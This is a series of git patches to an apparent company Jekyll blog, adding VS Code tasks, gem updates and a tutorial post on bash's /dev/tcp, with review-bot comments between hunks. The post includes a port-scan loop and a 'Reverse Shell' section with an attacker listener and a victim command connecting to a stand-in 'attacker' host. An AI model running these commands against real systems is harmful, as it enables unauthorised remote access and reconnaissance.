From 10ddc11db6fe2eff29541c7a6d2e1f486b7b03f0 Mon Sep 17 00:00:00 2001 From: Konstantinos Koukopoulos Date: Thu, 11 May 2023 08:50:50 +0300 Subject: [PATCH 1/7] Add stefanos to authors.yml --- _data/authors.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/_data/authors.yml b/_data/authors.yml index a9baf54..f2f3321 100644 --- a/_data/authors.yml +++ b/_data/authors.yml @@ -19,3 +19,6 @@ tim_fraczak: david_suh: name: David Suh title: Software Engineer - Enterprise +stefanos_kalandaridis: + name: Stefanos Kalandaridis + title: Site Reliability Engineer From 688c00ed825c5e799469bc2ad40f01fe413beb97 Mon Sep 17 00:00:00 2001 From: Konstantinos Koukopoulos Date: Thu, 11 May 2023 06:03:27 +0000 Subject: [PATCH 2/7] Add vscode tasks for codespaces and update some packages --- .vscode/tasks.json | 25 +++++++++++++++++++++++++ Gemfile.lock | 14 +++++++------- 2 files changed, 32 insertions(+), 7 deletions(-) create mode 100644 .vscode/tasks.json diff --git a/.vscode/tasks.json b/.vscode/tasks.json new file mode 100644 index 0000000..470c22c --- /dev/null +++ b/.vscode/tasks.json @@ -0,0 +1,25 @@ +{ + "version": "2.0.0", + "tasks": [ + { + "command": "rvm install ruby-2.5.1; rvm use 2.5.1; gem install bundler:2.1.4; bundle update", + "type": "shell", + "label": "Jekyll - Install Dev Server", + "options": { + "shell": { + "args": ["--login"] + } + }, + }, + { + "command": "rvm use 2.5.1; bundle exec jekyll serve", + "type": "shell", + "label": "Jekyll - Run Dev Server", + "options": { + "shell": { + "args": ["--login"] + } + }, + }, + ] + } \ No newline at end of file diff --git a/Gemfile.lock b/Gemfile.lock index 0fb4e89..b3cea7b 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,10 +1,10 @@ GEM remote: https://rubygems.org/ specs: - addressable (2.8.1) + addressable (2.8.4) public_suffix (>= 2.0.2, < 6.0) colorator (1.1.0) - concurrent-ruby (1.1.10) + concurrent-ruby (1.2.2) em-websocket (0.5.3) eventmachine (>= 0.12.9) http_parser.rb (~> 0) 
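Review bot: The "Jekyll - Install Dev Server" task in the new `.vscode/tasks.json` ends its `command` with `bundle update`, which re-resolves every gem to the newest version the Gemfile allows and rewrites Gemfile.lock. Each Codespace can therefore pull different, unreviewed gem releases, whereas `bundle install` installs exactly what the lockfile pins. The steps are joined with `;`, so a failed `rvm install` or `gem install` does not stop the later ones. Proposed: `"command": "rvm install ruby-2.5.1 && rvm use 2.5.1 && gem install bundler:2.1.4 && bundle install",`. The Ruby 2.5 series no longer receives upstream security fixes, which is worth a follow-up even if the site still needs it.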
@@ -12,7 +12,7 @@ GEM ffi (1.15.5) forwardable-extended (2.6.0) http_parser.rb (0.8.0) - i18n (1.12.0) + i18n (1.13.0) concurrent-ruby (~> 1.0) jekyll (4.0.1) addressable (~> 2.4) @@ -41,8 +41,8 @@ GEM rexml kramdown-parser-gfm (1.1.0) kramdown (~> 2.0) - liquid (4.0.3) - listen (3.7.1) + liquid (4.0.4) + listen (3.8.0) rb-fsevent (~> 0.10, >= 0.10.3) rb-inotify (~> 0.9, >= 0.9.10) mercenary (0.3.6) @@ -64,9 +64,9 @@ GEM terminal-table (1.8.0) unicode-display_width (~> 1.1, >= 1.1.1) thread_safe (0.3.6) - tzinfo (1.2.10) + tzinfo (1.2.11) thread_safe (~> 0.1) - tzinfo-data (1.2022.7) + tzinfo-data (1.2023.3) tzinfo (>= 1.0.0) unicode-display_width (1.8.0) wdm (0.1.1) From ad8e2ff9c861859b918d531971000c15af5421ef Mon Sep 17 00:00:00 2001 From: Konstantinos Koukopoulos Date: Thu, 11 May 2023 06:20:14 +0000 Subject: [PATCH 3/7] Add front-matter for dev tcp post --- ...3-05-11-bash-ing-your-network-with-dev-tcp.md | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 _posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md diff --git a/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md b/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md new file mode 100644 index 0000000..7db8c6c --- /dev/null +++ b/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md @@ -0,0 +1,16 @@ +--- +layout: post +title: Bash-ing your network with /dev/tcp +excerpt: . +author: stefanos_kalandaridis +categories: +- troubleshooting +- networking +- security +tags: +- bash +- networking +- http +- security +--- +# TODO \ No newline at end of file From 66f8bd99eb1c9a088abac294e72969b9b5a17f29 Mon Sep 17 00:00:00 2001 From: Konstantinos Koukopoulos Date: Thu, 11 May 2023 06:28:39 +0000 Subject: [PATCH 4/7] Launch dev server on all local addresses, not just 127.0.0.1 --- .vscode/tasks.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.vscode/tasks.json b/.vscode/tasks.json index 470c22c..527d53f 100644 --- a/.vscode/tasks.json 
+++ b/.vscode/tasks.json @@ -12,7 +12,7 @@ }, }, { - "command": "rvm use 2.5.1; bundle exec jekyll serve", + "command": "rvm use 2.5.1; bundle exec jekyll serve --host localhost", "type": "shell", "label": "Jekyll - Run Dev Server", "options": { From 1e98408195ca954f58fa13b8af3ceb49ff0de5f9 Mon Sep 17 00:00:00 2001 From: Stefanos Kalandaridis Date: Thu, 11 May 2023 11:48:00 +0300 Subject: [PATCH 5/7] Add /dev/tcp blog post --- ...5-11-bash-ing-your-network-with-dev-tcp.md | 85 ++++++++++++++++++- 1 file changed, 84 insertions(+), 1 deletion(-) diff --git a/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md b/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md index 7db8c6c..8a77c4c 100644 --- a/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md +++ b/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md 
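Review bot: The commit subject says the dev server should listen on all local addresses, but the added `--host localhost` keeps it on loopback, only selected by name instead of `127.0.0.1`. If loopback is the intent, the subject should say so; it is the safer choice, since a dev server bound to every interface is reachable by anything that can route to the machine. If the Codespaces port forward really needs every interface, that would be `--host 0.0.0.0`, and the reason belongs in the commit message. The task object starts above this hunk.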
@@ -13,4 +13,87 @@ tags: - http - security --- -# TODO \ No newline at end of file +# bash /dev/tcp special file + +### /dev/tcp is a file descriptor of bash shell + +In Bash, `/dev/tcp` is a special file that allows you to establish network connections using the TCP/IP protocol. It provides a simple way to communicate with remote servers over a network. + +Using `/dev/tcp`, you can open a network socket and read from or write to it, similar to how you would read from or write to a file. This feature is primarily available in Bash shells on Unix-like systems. + +It can be accessed for multiple reasons but the basic operation of it is to open a raw TCP stream. +/dev/udp is also valid. + +[Port Scanning](#port-scanning) +[Read TCP stream](#read-tcp-stream) +[File Transfer](#file-transfer) +[Reverse Shell](#reverse-shell) +[HTTP Requests](#http-requests) + +### Port scanning +#### One of the most common uses of it is to check if a port is open in a remote host +``` +timeout 0.5 echo -n 2>/dev/null < /dev/tcp/127.0.0.1/7777 && echo "open" || echo "closed" +``` + +#### This can be extremely usefull in cases where a machine/container doesn't have nc, curl, wget or any other utility to check for network connection +Let's say we are in a kubernetes pod that runs on a minimal image having bash. We want to check if it can communicate with a service or if the service is actually listening on a port. 
+``` +kubectl exec -it svc/random-service -- bash +$ echo < /dev/tcp/other-service.namespace.svc.cluster.local/7777 && echo "open" || echo "closed" +``` + +#### You can make a port scanner with a one liner (and it's pretty fast) +``` +for port in {1..8888}; do timeout 0.5 echo -n 2>/dev/null < /dev/tcp/127.0.0.1/$port && echo "$port/tcp open"; done +``` + +### Read TCP stream +#### Get the time from nist.gov +``` +cat < /dev/tcp/time.nist.gov/13 +``` + +### File Transfer +#### Sender +``` +nc -lvnp 7777 < file.txt +``` +#### Receiver +``` +cat < /dev/tcp/sender/7777 > file.txt +``` + +#### Alternatively + +#### Receiver +``` +nc -lvnp 7777 > file.txt +``` +#### Sender +``` +cat file.txt > /dev/tcp/receiver/7777 +``` + +### Reverse Shell +#### Attacker +``` +nc -lvnp 7777 +``` +#### Victim +``` +bash -c 'bash -i >& /dev/tcp/attacker/7777 0>&1' +``` + +### HTTP Requests +#### Fetching the `www.google.com` page +``` +exec 5<>/dev/tcp/www.google.com/80 +echo -e "GET / HTTP/1.1\r\nhost: www.google.com\r\nConnection: close\r\n\r\n" >&5 +cat <&5 +``` + + +#### References +https://tldp.org/LDP/abs/html/devref1.html +https://w0lfram1te.com/exploring-dev-tcp \ No newline at end of file From 48b25551ce1fad9f7008923781dc8e3e1fc5789b Mon Sep 17 00:00:00 2001 From: Stefanos Kalandaridis Date: Thu, 11 May 2023 13:12:04 +0300 Subject: [PATCH 6/7] Add excerpt, fix indentaion --- ...5-11-bash-ing-your-network-with-dev-tcp.md | 21 +++++++++++-------- 1 file changed, 12 insertions(+), 9 deletions(-) diff --git a/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md b/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md index 8a77c4c..5f6e1a0 100644 --- a/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md +++ b/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md 
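Review bot: In the port-check snippets, `timeout 0.5` does not bound the connection attempt: bash opens `/dev/tcp/...` while setting up the redirection, before `timeout` is executed, so a filtered port blocks until the kernel's connect timeout. Wrapping the redirection in a child shell puts it under the timer: `timeout 0.5 bash -c 'echo -n < /dev/tcp/127.0.0.1/7777' 2>/dev/null && echo "open" || echo "closed"`. The loop rewritten in the `@@ -46,9 +44,11 @@` hunk of patch 7 drops `timeout` altogether and has the same stall. The Reverse Shell section would also benefit from a defender's sentence after it, for example `Removing nc from an image does not remove this capability, so restrict egress and alert on bash processes that hold outbound sockets.`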
@@ -1,7 +1,12 @@ --- layout: post title: Bash-ing your network with /dev/tcp -excerpt: . +excerpt: In Bash, `/dev/tcp` is a special file that allows you to establish network connections using the TCP/IP protocol. It provides a simple way to communicate with remote servers over a network. + +Using `/dev/tcp`, you can open a network socket and read from or write to it, similar to how you would read from or write to a file. This feature is primarily available in Bash shells on Unix-like systems. + +It can be accessed for multiple reasons but the basic operation of it is to open a raw TCP stream. +/dev/udp is also valid. author: stefanos_kalandaridis categories: - troubleshooting @@ -13,9 +18,7 @@ tags: - http - security --- -# bash /dev/tcp special file - -### /dev/tcp is a file descriptor of bash shell +## /dev/tcp is a file descriptor of bash shell In Bash, `/dev/tcp` is a special file that allows you to establish network connections using the TCP/IP protocol. It provides a simple way to communicate with remote servers over a network. @@ -24,11 +27,11 @@ Using `/dev/tcp`, you can open a network socket and read from or write to it, si It can be accessed for multiple reasons but the basic operation of it is to open a raw TCP stream. /dev/udp is also valid. -[Port Scanning](#port-scanning) -[Read TCP stream](#read-tcp-stream) -[File Transfer](#file-transfer) -[Reverse Shell](#reverse-shell) -[HTTP Requests](#http-requests) +- [Port Scanning](#port-scanning) +- [Read TCP stream](#read-tcp-stream) +- [File Transfer](#file-transfer) +- [Reverse Shell](#reverse-shell) +- [HTTP Requests](#http-requests) ### Port scanning #### One of the most common uses of it is to check if a port is open in a remote host From c55afc06ef4817a36f7fd36d8b4c05c91979404a Mon Sep 17 00:00:00 2001 
From: skalandaridis <79609313+skalandaridis@users.noreply.github.com> Date: Thu, 11 May 2023 10:42:09 +0000 Subject: [PATCH 7/7] Format fixing --- .vscode/tasks.json | 17 ++++++++--- ...5-11-bash-ing-your-network-with-dev-tcp.md | 30 ++++++++++--------- 2 files changed, 29 insertions(+), 18 deletions(-) diff --git a/.vscode/tasks.json b/.vscode/tasks.json index 527d53f..94c9502 100644 --- a/.vscode/tasks.json +++ b/.vscode/tasks.json @@ -7,9 +7,16 @@ "label": "Jekyll - Install Dev Server", "options": { "shell": { - "args": ["--login"] + "args": [ + "--login" + ] } }, + "problemMatcher": [], + "group": { + "kind": "test", + "isDefault": true + } }, { "command": "rvm use 2.5.1; bundle exec jekyll serve --host localhost", @@ -17,9 +24,11 @@ "label": "Jekyll - Run Dev Server", "options": { "shell": { - "args": ["--login"] + "args": [ + "--login" + ] } - }, - }, + } + } ] } \ No newline at end of file diff --git a/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md b/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md index 5f6e1a0..b131c72 100644 --- a/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md +++ b/_posts/2023-05-11-bash-ing-your-network-with-dev-tcp.md 
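Review bot: The `group` block added to "Jekyll - Install Dev Server" makes it the default test task, so the Run Test Task shortcut runs the install command added earlier in this series (`rvm install ...; bundle update`). That downloads and re-resolves gems rather than testing anything. If a default is wanted, "Jekyll - Run Dev Server" is the less surprising target; otherwise drop `"isDefault": true` from the install task. Both task objects start above their hunks.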
@@ -1,12 +1,11 @@ --- layout: post title: Bash-ing your network with /dev/tcp -excerpt: In Bash, `/dev/tcp` is a special file that allows you to establish network connections using the TCP/IP protocol. It provides a simple way to communicate with remote servers over a network. +excerpt: "In Bash, `/dev/tcp` is a special file that allows you to establish network connections using the TCP/IP protocol. It provides a simple way to communicate with remote servers over a network. Using `/dev/tcp`, you can open a network socket and read from or write to it, similar to how you would read from or write to a file. This feature is primarily available in Bash shells on Unix-like systems. -It can be accessed for multiple reasons but the basic operation of it is to open a raw TCP stream. -/dev/udp is also valid. +/dev/udp is also valid." author: stefanos_kalandaridis categories: - troubleshooting @@ -24,7 +23,6 @@ In Bash, `/dev/tcp` is a special file that allows you to establish network conne Using `/dev/tcp`, you can open a network socket and read from or write to it, similar to how you would read from or write to a file. This feature is primarily available in Bash shells on Unix-like systems. -It can be accessed for multiple reasons but the basic operation of it is to open a raw TCP stream. /dev/udp is also valid. - [Port Scanning](#port-scanning) @@ -46,9 +44,11 @@ kubectl exec -it svc/random-service -- bash $ echo < /dev/tcp/other-service.namespace.svc.cluster.local/7777 && echo "open" || echo "closed" ``` -#### You can make a port scanner with a one liner (and it's pretty fast) +#### You can make a port scanner with it (and it's pretty fast) ``` -for port in {1..8888}; do timeout 0.5 echo -n 2>/dev/null < /dev/tcp/127.0.0.1/$port && echo "$port/tcp open"; done +for port in {1..8888}; do + echo -n 2>/dev/null < /dev/tcp/127.0.0.1/$port && echo "$port/tcp open" +done ``` ### Read TCP stream 
@@ -58,22 +58,23 @@ cat < /dev/tcp/time.nist.gov/13 ``` ### File Transfer -#### Sender +#### Option 1 +Sender ``` nc -lvnp 7777 < file.txt ``` -#### Receiver +Receiver ``` cat < /dev/tcp/sender/7777 > file.txt ``` -#### Alternatively +#### Option 2 -#### Receiver +Receiver ``` nc -lvnp 7777 > file.txt ``` -#### Sender +Sender ``` cat file.txt > /dev/tcp/receiver/7777 ``` @@ -97,6 +98,7 @@ cat <&5 ``` -#### References -https://tldp.org/LDP/abs/html/devref1.html -https://w0lfram1te.com/exploring-dev-tcp \ No newline at end of file + +### References +- [https://tldp.org/LDP/abs/html/devref1.html](https://tldp.org/LDP/abs/html/devref1.html) +- [https://w0lfram1te.com/exploring-dev-tcp](https://w0lfram1te.com/exploring-dev-tcp) \ No newline at end of file